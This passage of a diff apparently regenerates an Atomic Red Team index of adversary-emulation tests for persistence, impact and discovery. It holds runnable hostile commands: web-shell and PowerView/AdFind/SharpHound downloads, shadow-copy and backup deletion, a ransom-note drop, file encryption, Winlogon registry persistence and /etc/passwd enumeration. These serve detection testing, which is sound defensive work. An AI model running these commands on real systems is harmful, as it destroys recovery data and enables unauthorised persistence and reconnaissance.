dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer 
@@ -49665,13 +49665,13 @@ persistence: dependencies: - description: 'Microsoft Exchange SnapIn must be installed - ' +' prereq_command: 'Get-TransportAgent -TransportService FrontEnd - ' +' get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - ' +' executor: command: | Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} @@ -49883,7 +49883,7 @@ persistence: auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux @@ -49895,13 +49895,13 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' name: sh - name: Add command to .bashrc auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -49913,7 +49913,7 @@ persistence: executor: command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' name: sh T1078: technique: @@ -50082,10 +50082,10 @@ persistence: dependencies: - description: 'Web shell must exist on disk at specified location (#{web_shells}) - ' +' prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" @@ -50094,7 +50094,7 @@ persistence: executor: command: 'xcopy /I /Y #{web_shells} #{web_shell_path} - ' +' cleanup_command: | del #{web_shell_path}\b.jsp /q >nul 2>&1 del #{web_shell_path}\tests.jsp /q >nul 2>&1 
@@ -50367,10 +50367,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50403,10 +50403,10 @@ persistence: dependencies: - description: 'Service binary must exist on disk at specified location (#{binary_path}) - ' +' prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" @@ -50502,11 +50502,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Userinit Key Persistence - PowerShell auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb @@ -50525,11 +50525,11 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' name: powershell - name: Winlogon Notify Key Logon Persistence - PowerShell auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 
@@ -50551,7 +50551,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -50695,7 +50695,7 @@ impact: net.exe user #{user_account} #{new_password} cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Delete User - Windows @@ -50703,7 +50703,7 @@ impact: description: 'Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -50725,21 +50725,21 @@ impact: auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947 description: 'This test will remove an account from the domain admins group - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' input_arguments: super_user: description: Account used to run the execution command (must include domain). @@ -50983,10 +50983,10 @@ impact: - description: 'Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe}) - ' +' prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip" Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force 
@@ -51017,7 +51017,7 @@ impact: command: 'dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk ''{print $5}'') iflag=count_bytes - ' +' name: bash - name: Overwrite deleted data on C drive auto_generated_guid: 321fd25e-0007-417f-adec-33232252be19 @@ -51029,7 +51029,7 @@ impact: executor: command: 'cipher.exe /w:C: - ' +' name: command_prompt T1486: technique: @@ -51109,7 +51109,7 @@ impact: auto_generated_guid: 7b8ce084-3922-4618-8d22-95f996173765 description: 'Uses gpg to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51133,10 +51133,10 @@ impact: dependencies: - description: 'Finds where gpg is located - ' +' prereq_command: 'which_gpg=`which gpg` - ' +' get_prereq_command: "(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" executor: @@ -51145,15 +51145,15 @@ impact: command: 'echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path} - ' +' cleanup_command: 'rm #{encrypted_file_path} - ' +' - name: Encrypt files using 7z (Linux) auto_generated_guid: 53e6735a-4727-44cc-b35b-237682a151ad description: 'Uses 7z to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51173,10 +51173,10 @@ impact: dependencies: - description: 'Finds where 7z is located - ' +' prereq_command: 'which_7z=`which 7z` - ' +' get_prereq_command: '' executor: name: bash @@ -51191,7 +51191,7 @@ impact: an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user''s home directory. - ' +' supported_platforms: - linux input_arguments: @@ -51218,7 +51218,7 @@ impact: - description: 'Finds where ccencrypt and ccdecrypt is located and copies input file - ' +' prereq_command: | which_ccencrypt=`which ccencrypt` which_ccdecrypt=`which ccdecrypt` 
@@ -51233,14 +51233,14 @@ impact: #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi - ' +' cleanup_command: "if [[ $USER == \"root\" ]]; then mv #{cped_file_path} #{root_input_file_path}; else cp #{cped_file_path} #{user_input_file_path}; fi \n" - name: Encrypt files using openssl (Linux) auto_generated_guid: 142752dc-ca71-443b-9359-cf6f497315f1 description: 'Uses openssl to encrypt a file - ' +' supported_platforms: - linux input_arguments: @@ -51268,10 +51268,10 @@ impact: dependencies: - description: 'Finds where openssl is located - ' +' prereq_command: 'which_openssl=`which openssl` - ' +' get_prereq_command: '' executor: name: bash @@ -51294,10 +51294,10 @@ impact: elevation_required: true command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt - ' +' cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 - ' +' T1565: technique: external_references: @@ -51948,18 +51948,18 @@ impact: - description: 'Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8. - ' +' prereq_command: 'if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'vssadmin.exe create shadow /for=c: - ' +' executor: command: 'vssadmin.exe delete shadows /all /quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Delete Volume Shadow Copies via WMI @@ -51972,7 +51972,7 @@ impact: executor: command: 'wmic.exe shadowcopy delete - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete Windows Backup Catalog @@ -51985,7 +51985,7 @@ impact: executor: command: 'wbadmin delete catalog -quiet - ' +' name: command_prompt elevation_required: true - name: Windows - Disable Windows Recovery Console Repair 
@@ -52016,7 +52016,7 @@ impact: executor: command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - ' +' name: powershell elevation_required: true - name: Windows - Delete Backup Files @@ -52030,7 +52030,7 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk - ' +' name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup @@ -52039,13 +52039,13 @@ impact: technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. - ' +' supported_platforms: - windows executor: command: 'wbadmin delete systemstatebackup -keepVersions:0 - ' +' name: command_prompt elevation_required: true - name: Windows - Disable the SR scheduled task @@ -52053,17 +52053,17 @@ impact: description: 'Use schtasks.exe to disable the System Restore (SR) scheduled task - ' +' supported_platforms: - windows executor: command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable - ' +' cleanup_command: 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1491.001: @@ -52125,7 +52125,7 @@ impact: auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3 description: 'Downloads an image from a URL and sets it as the desktop wallpaper. - ' +' supported_platforms: - windows input_arguments: @@ -52492,7 +52492,7 @@ impact: executor: command: 'yes > /dev/null - ' +' name: bash T1565.003: technique: @@ -52710,10 +52710,10 @@ impact: executor: command: 'sc.exe stop #{service_name} - ' +' cleanup_command: 'sc.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service using net.exe 
@@ -52732,10 +52732,10 @@ impact: executor: command: 'net.exe stop #{service_name} - ' +' cleanup_command: 'net.exe start #{service_name} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Windows - Stop service by killing process @@ -52755,7 +52755,7 @@ impact: executor: command: 'taskkill.exe /f /im #{process_name} - ' +' name: command_prompt T1565.001: technique: @@ -52866,7 +52866,7 @@ impact: auto_generated_guid: ad254fa8-45c0-403b-8c77-e00b3d3e7a64 description: 'This test shuts down a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52877,14 +52877,14 @@ impact: executor: command: 'shutdown /s /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System - Windows auto_generated_guid: f4648f0d-bf78-483c-bafc-3ec99cd1c302 description: 'This test restarts a Windows system. - ' +' supported_platforms: - windows input_arguments: @@ -52895,14 +52895,14 @@ impact: executor: command: 'shutdown /r /t #{timeout} - ' +' name: command_prompt elevation_required: true - name: Restart System via `shutdown` - macOS/Linux auto_generated_guid: 6326dbc4-444b-4c04-88f4-27e94d0327cb description: 'This test restarts a macOS/Linux system. - ' +' supported_platforms: - macos - linux @@ -52914,14 +52914,14 @@ impact: executor: command: 'shutdown -r #{timeout} - ' +' name: bash elevation_required: true - name: Shutdown System via `shutdown` - macOS/Linux auto_generated_guid: 4963a81e-a3ad-4f02-adda-812343b351de description: 'This test shuts down a macOS/Linux system using a halt. - ' +' supported_platforms: - macos - linux 
@@ -52933,73 +52933,73 @@ impact: executor: command: 'shutdown -h #{timeout} - ' +' name: bash elevation_required: true - name: Restart System via `reboot` - macOS/Linux auto_generated_guid: 47d0b042-a918-40ab-8cf9-150ffe919027 description: 'This test restarts a macOS/Linux system via `reboot`. - ' +' supported_platforms: - macos - linux executor: command: 'reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `halt` - Linux auto_generated_guid: 918f70ab-e1ef-49ff-bc57-b27021df84dd description: 'This test shuts down a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt -p - ' +' name: bash elevation_required: true - name: Reboot System via `halt` - Linux auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e description: 'This test restarts a Linux system using `halt`. - ' +' supported_platforms: - linux executor: command: 'halt --reboot - ' +' name: bash elevation_required: true - name: Shutdown System via `poweroff` - Linux auto_generated_guid: 73a90cd2-48a2-4ac5-8594-2af35fa909fa description: 'This test shuts down a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff - ' +' name: bash elevation_required: true - name: Reboot System via `poweroff` - Linux auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41 description: 'This test restarts a Linux system using `poweroff`. - ' +' supported_platforms: - linux executor: command: 'poweroff --reboot - ' +' name: bash elevation_required: true T1565.002: 
@@ -53170,10 +53170,10 @@ discovery: dependencies: - description: 'T1010.cs must exist on disk at specified location (#{input_source_code}) - ' +' prereq_command: 'if (Test-Path #{input_source_code}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_source_code}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}" @@ -53183,7 +53183,7 @@ discovery: #{output_file_name} cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1 - ' +' name: command_prompt T1217: technique: @@ -53233,7 +53233,7 @@ discovery: description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - linux input_arguments: @@ -53247,14 +53247,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Mozilla Firefox Bookmark Database Files on macOS auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: @@ -53268,14 +53268,14 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome Bookmark JSON Files on macOS auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. - ' +' supported_platforms: - macos input_arguments: 
@@ -53289,7 +53289,7 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List Google Chrome / Opera Bookmarks on Windows with powershell auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 @@ -53302,7 +53302,7 @@ discovery: command: 'Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force - ' +' name: powershell - name: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 @@ -53314,7 +53314,7 @@ discovery: executor: command: 'where /R C:\Users\ Bookmarks - ' +' name: command_prompt - name: List Mozilla Firefox bookmarks on Windows with command prompt auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 @@ -53326,7 +53326,7 @@ discovery: executor: command: 'where /R C:\Users\ places.sqlite - ' +' name: command_prompt - name: List Internet Explorer Bookmarks using the command prompt auto_generated_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 @@ -53337,7 +53337,7 @@ discovery: executor: command: 'dir /s /b %USERPROFILE%\Favorites - ' +' name: command_prompt T1087.004: technique: @@ -53784,7 +53784,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -53798,7 +53798,7 @@ discovery: description: 'Enumerate logged on users. Upon exeuction, logged on users will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -53809,7 +53809,7 @@ discovery: executor: command: 'query user /SERVER:#{computer_name} - ' +' name: command_prompt - name: Automated AD Recon (ADRecon) auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59 
@@ -53827,18 +53827,18 @@ discovery: dependencies: - description: 'ADRecon must exist on disk at specified location (#{adrecon_path}) - ' +' prereq_command: 'if (Test-Path #{adrecon_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path} - ' +' executor: command: 'Invoke-Expression #{adrecon_path} - ' +' cleanup_command: | Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse @@ -53859,14 +53859,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength @@ -53888,14 +53888,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc admincountdmp\n" name: command_prompt 
@@ -53915,14 +53915,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=person)\n" name: command_prompt @@ -53942,14 +53942,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -sc exchaddresses\n" name: command_prompt @@ -53958,13 +53958,13 @@ discovery: description: 'This test will enumerate the details of the built-in domain admin account - ' +' supported_platforms: - windows executor: command: 'net user administrator /domain - ' +' name: command_prompt - name: Enumerate Active Directory for Unconstrained Delegation auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b @@ -53987,7 +53987,7 @@ discovery: dependencies: - description: 'PowerShell ActiveDirectory Module must be installed - ' +' prereq_command: | Try { Import-Module ActiveDirectory -ErrorAction Stop | Out-Null @@ -54008,7 +54008,7 @@ discovery: command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})'' -Server #{domain} - ' +' T1069.002: technique: external_references: @@ -54076,7 +54076,7 @@ discovery: executor: command: 'get-ADPrincipalGroupMembership #{user} | select name - ' +' name: powershell - name: Elevated group enumeration using net group (Domain) auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 
@@ -54098,7 +54098,7 @@ discovery: execution, progress and info about each host in the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54112,7 +54112,7 @@ discovery: machines in the domain. Upon execution, information about each machine will be displayed. - ' +' supported_platforms: - windows executor: @@ -54125,7 +54125,7 @@ discovery: description: 'takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -54143,39 +54143,39 @@ discovery: description: 'When successful, accounts that do not require kerberos pre-auth will be returned - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined. - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually. - ' +' - description: 'Requires the Active Directory module for powershell to be installed. - ' +' prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" - ' +' executor: name: powershell elevation_required: false command: 'get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE} - ' +' - name: Adfind - Query Active Directory Groups auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 description: | 
@@ -54192,10 +54192,10 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} @@ -54285,7 +54285,7 @@ discovery: executor: command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr * - ' +' name: command_prompt - name: Windows - Discover domain trusts with nltest auto_generated_guid: 2e22641d-0498-48d2-b9ff-c71e496ccdbe @@ -54298,17 +54298,17 @@ discovery: dependencies: - description: 'nltest.exe from RSAT must be present on disk - ' +' prereq_command: 'WHERE nltest.exe >NUL 2>&1 - ' +' get_prereq_command: 'echo Sorry RSAT must be installed manually - ' +' executor: command: 'nltest /domain_trusts - ' +' name: command_prompt - name: Powershell enumerate domains and forests auto_generated_guid: c58fbc62-8a62-489e-8f2d-3565d7d96f30 @@ -54321,26 +54321,26 @@ discovery: dependencies: - description: 'PowerView PowerShell script must exist on disk - ' +' prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1" - ' +' - description: 'RSAT PowerShell AD admin cmdlets must be installed - ' +' prereq_command: 'if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Write-Host "Sorry RSAT must be installed manually" - ' +' executor: command: | Import-Module "$env:TEMP\PowerView.ps1" 
@@ -54365,14 +54365,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n" name: command_prompt @@ -54392,14 +54392,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -gcb -sc trustdmp\n" name: command_prompt @@ -54409,7 +54409,7 @@ discovery: Upon execution, progress and info about trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54423,7 +54423,7 @@ discovery: Upon execution, progress and info about forest trusts within the domain being scanned will be displayed. - ' +' supported_platforms: - windows executor: @@ -54561,7 +54561,7 @@ discovery: description: 'Find or discover files on the file system. Upon execution, file and folder information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54600,13 +54600,13 @@ discovery: which sh cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Nix File and Directory Discovery 2 auto_generated_guid: 13c5e1ae-605b-46c4-a79f-db28c77ff24e description: 'Find or discover files on the file system - ' +' supported_platforms: - macos - linux 
@@ -54712,7 +54712,7 @@ discovery: auto_generated_guid: f8aab3dd-5990-4bf8-b8ab-2226c951696f description: 'Enumerate all accounts by copying /etc/passwd to another file - ' +' supported_platforms: - linux input_arguments: @@ -54726,7 +54726,7 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: View sudoers access auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -54745,14 +54745,14 @@ discovery: cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh elevation_required: true - name: View accounts with UID 0 auto_generated_guid: c955a599-3653-4fe5-b631-f11c00eb0397 description: 'View accounts with UID 0 - ' +' supported_platforms: - linux - macos @@ -54767,26 +54767,26 @@ discovery: cat #{output_file} 2>/dev/null cleanup_command: 'rm -f #{output_file} 2>/dev/null - ' +' name: sh - name: List opened files by user auto_generated_guid: 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb description: 'List opened files by user - ' +' supported_platforms: - linux - macos executor: command: 'username=$(id -u -n) && lsof -u $username - ' +' name: sh - name: Show if a user account has ever logged in remotely auto_generated_guid: 0f0b6a29-08c3-44ad-a30b-47fd996b2110 description: 'Show if a user account has ever logged in remotely - ' +' supported_platforms: - linux input_arguments: @@ -54798,27 +54798,27 @@ discovery: dependencies: - description: 'Check if lastlog command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v lastlog)" ]; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get install login; exit 1; - ' +' executor: command: | lastlog > #{output_file} cat #{output_file} cleanup_command: 'rm -f #{output_file} - ' +' name: sh - name: Enumerate users and groups auto_generated_guid: e6f36545-dc1e-47f0-9f48-7f730f54a02e description: 'Utilize groups and id to enumerate users and groups - ' +' supported_platforms: - linux - macos 
@@ -54831,7 +54831,7 @@ discovery: auto_generated_guid: 319e9f6c-7a9e-432e-8c62-9385c803b6f2 description: 'Utilize local utilities to enumerate users and groups - ' +' supported_platforms: - macos executor: @@ -54862,7 +54862,7 @@ discovery: description: 'Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. - ' +' supported_platforms: - windows executor: @@ -54882,13 +54882,13 @@ discovery: description: 'Enumerate logged on users. Upon execution, logged on users will be displayed. - ' +' supported_platforms: - windows executor: command: 'query user - ' +' name: command_prompt T1069.001: technique: @@ -54932,7 +54932,7 @@ discovery: auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae description: 'Permission Groups Discovery - ' +' supported_platforms: - macos - linux @@ -54974,7 +54974,7 @@ discovery: description: 'This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR) - ' +' supported_platforms: - windows input_arguments: @@ -54998,11 +54998,11 @@ discovery: prereq_command: 'if (Test-Path "#{sharphound_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/BloodHoundAD/BloodHound/blob/e062fe73d73c015dccb37fae5089342d009b84b8/Collectors/SharpHound.exe?raw=true" -OutFile "#{sharphound_path}" - ' +' executor: name: powershell elevation_required: false 
@@ -55011,19 +55011,19 @@ discovery: & "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}" cleanup_command: 'Remove-Item -Recurse #{output_path} -ErrorAction Ignore - ' +' - name: Wmic Group Discovery auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2 description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'wmic.exe group get name - ' +' name: powershell - name: WMIObject Group Discovery auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13 @@ -55031,13 +55031,13 @@ discovery: groups on the endpoint. Upon execution, Upon execution, information will be displayed of local groups on system. - ' +' supported_platforms: - windows executor: command: 'Get-WMIObject Win32_Group - ' +' name: powershell T1046: technique: @@ -55133,11 +55133,11 @@ discovery: dependencies: - description: 'Check if nmap command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n" executor: @@ -55164,7 +55164,7 @@ discovery: dependencies: - description: 'NMap must 